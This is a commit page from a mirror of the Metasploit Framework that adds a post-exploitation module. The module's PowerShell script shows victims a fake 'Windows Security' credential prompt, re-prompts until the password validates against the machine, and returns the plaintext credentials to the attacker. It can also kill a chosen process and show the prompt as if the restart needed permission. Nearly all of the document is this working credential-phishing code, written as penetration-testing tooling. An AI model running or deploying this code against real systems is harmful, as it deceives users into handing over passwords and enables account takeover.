infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add post module to phish windows user credentials

bug/bundler_fix
wez3 2015-01-30 19:50:04 +01:00
parent cb076adb19
commit 25ac9c1ed9
2 changed files with 145 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
data/post/powershell/Invoke-LoginPrompt.ps1 Normal file
View File

@ -0,0 +1,22 @@
function Invoke-LoginPrompt{
$cred = $Host.ui.PromptForCredential("Windows Security", "R{DESCRIPTION}", "$env:userdomain\$env:username","")
$username = "$env:username"
$domain = "$env:userdomain"
$full = "$domain" + "\" + "$username"
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
while($DS.ValidateCredentials("$full","$password") -ne $True){
$cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
$username = "$env:username"
$domain = "$env:userdomain"
$full = "$domain" + "\" + "$username"
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$DS.ValidateCredentials("$full", "$password") | out-null
}
$output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
$output
R{START_PROCESS}
}

123
modules/post/windows/gather/phish_windows_credentials.rb Normal file
View File

@ -0,0 +1,123 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Windows::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather User Credentials (phishing)',
'Description' => %q{
This module is able to perform a phishing attack on the target by popping up a loginprompt.
When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.
The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Wesley Neelen <security[at]forsec.nl/@wez3forsec>', # Metasploit module
'Matt Nelson (@enigma0x3)' # Author original powershell script
],
'References' => [ 'URL', 'https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit' ],
'Platform' => [ 'win' ],
'Arch' => [ 'x86', 'x64' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('PROCESS', [ false, 'Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)' ]),
OptString.new('DESCRIPTION', [ true, 'Message shown in the loginprompt', "{PROCESS_NAME} needs your permissions to start. Please enter user credentials"]),
], self.class)
register_advanced_options(
[
OptInt.new('TIMEOUT', [true, 'The maximum time (in seconds) to wait for any Powershell scripts to complete', 120])
], self.class)
end
# Function to run the InvokePrompt powershell script
def execute_invokeprompt_script(description,process,path)
base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "Invoke-LoginPrompt.ps1"))
if process.nil?
sdescription = description.gsub("{PROCESS_NAME} needs your permissions to start. ", "")
psh_script = base_script.gsub("R{DESCRIPTION}", "#{sdescription}") << "Invoke-LoginPrompt"
else
sdescription = description.gsub("{PROCESS_NAME}", process)
psh_script2 = base_script.gsub("R{DESCRIPTION}", "#{sdescription}") << "Invoke-LoginPrompt"
psh_script = psh_script2.gsub("R{START_PROCESS}", "start-process \"#{path}\"")
end
compressed_script = compress_script(psh_script)
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, datastore['TIMEOUT'])
while(d = cmd_out.channel.read)
print_good("#{d}")
end
end
# Function to monitor process creation
def procmon(process, description)
procs = []
existingProcs = []
detected = false
first = true
print_status("Monitoring new processes.")
while detected == false
procs = client.sys.process.processes
procs.each do |p|
if p['name'] == process or process == "*"
if first == true
print_status("#{p['name']} is already running. Waiting on new instances to start")
existingProcs.push(p['pid'])
else
if !existingProcs.include? p['pid']
print_status("New process detected: #{p['pid']} #{p['name']}")
killproc(p['name'],p['pid'], description,p['path'])
detected = true
end
end
end
end
first = false
end
end
# Function to kill the process
def killproc(process,pid,description,path)
print_status("Killing the process and starting the popup script. Waiting on the user to fill in his credentials...")
client.sys.process.kill(pid)
execute_invokeprompt_script(description,process,path)
end
# Main method
def run
process = datastore['PROCESS']
description = datastore['DESCRIPTION']
# Powershell installed check
if have_powershell?
print_good("PowerShell is installed.")
else
fail_with(Failure::Unknown, "PowerShell is not installed")
end
# Check whether target system is locked
locked = client.railgun.user32.GetForegroundWindow()['return']
if locked == 0
fail_with(Failure::Unknown, "Target system is locked. This post module cannot click on Outlooks security warning when the target system is locked")
end
# Switch to check whether a specific process needs to be monitored, or just show the popup immediatly.
case process
when nil
print_status("Starting the popup script. Waiting on the user to fill in his credentials...")
execute_invokeprompt_script(description, nil, nil)
else
procmon(process, description)
end
end
end